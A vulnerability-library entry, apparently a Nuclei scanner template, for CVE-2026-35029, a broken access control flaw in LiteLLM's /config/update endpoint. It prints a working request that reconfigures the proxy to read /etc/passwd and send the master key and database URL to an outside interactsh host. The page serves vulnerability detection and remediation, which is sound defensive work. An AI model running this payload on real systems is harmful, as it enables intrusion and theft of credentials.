/Vulnerability Library

LiteLLM - Arbitrary File Read

CVE-2026-35029
Verified

Description

LiteLLM < 1.83.0 contains a broken access control vulnerability caused by lack of admin role enforcement on /config/update endpoint, letting authenticated users modify configurations, execute code, read files, and take over accounts.

Severity

High

CVSS Score

8.8

Exploit Probability

26%

Affected Product

litellm

Published Date

April 22, 2026

Template Author

theamanrawat

CVE-2026-35029.yaml
id: CVE-2026-35029

info:
  name: LiteLLM - Arbitrary File Read
  author: theamanrawat
  severity: high
  description: |
    LiteLLM < 1.83.0 contains a broken access control vulnerability caused by lack of admin role enforcement on /config/update endpoint, letting authenticated users modify configurations, execute code, read files, and take over accounts.
  impact: |
    Authenticated users can execute arbitrary code, read server files, and take over privileged accounts, leading to full system compromise.
  remediation: |
    Update to version 1.83.0 or later.
  reference:
    - https://github.com/BerriAI/litellm
    - https://sec-consult.com/vulnerability-lab/advisory/broken-access-control-in-config-endpoint-in-litellm/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-35029
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-35029
    epss-score: 0.26409
    epss-percentile: 0.97762
    cwe-id: CWE-863
  metadata:
    max-request: 4
    verified: true
    vendor: berriai
    product: litellm
  tags: cve,cve2026,litellm,file-read,oob,oidc,oast,vuln,authenticated

http:
  - raw:
      - |
        POST /config/update HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{userkey}}
        Content-Type: application/json

        {"environment_variables":{"FILE_TO_READ":"/etc/passwd","EXFIL_PREFIX":"EXFIL"},"general_settings":{"pass_through_endpoints":[{"path":"/exfil-{{randstr}}","target":"https://{{interactsh-url}}","headers":{"LANGFUSE_PUBLIC_KEY":"os.environ/EXFIL_PREFIX","LANGFUSE_SECRET_KEY":"os.environ/oidc/env_path/FILE_TO_READ","X-DB-URL":"os.environ/DATABASE_URL","X-Master-Key":"os.environ/LITELLM_MASTER_KEY"}}]}}

      - |
        GET /health/liveliness HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /exfil-{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: interactsh_request
        name: content
        group: 1
        regex:
          - "Authorization:\\s*Basic\\s+([A-Za-z0-9+/=]+)"
        internal: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'regex("EXFIL:root:.*:0:0:", base64_decode(content))'
        condition: and
# digest: 490a0046304402206949f63d61b40c26f6f82d0a122e942ad2717bd84c1480cea59ef94ac79c54b302203d5abd03c399faaf95bdb3f37e95757fe1c994fde6cf3ef6ebf1d79529a64962:922c64590222798bb761d5b6d8e72950
8.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-35029
CWE ID:
cwe-863

References

https://github.com/BerriAI/litellmhttps://sec-consult.com/vulnerability-lab/advisory/broken-access-control-in-config-endpoint-in-litellm/https://nvd.nist.gov/vuln/detail/CVE-2026-35029

Remediation Steps

Update to version 1.83.0 or later.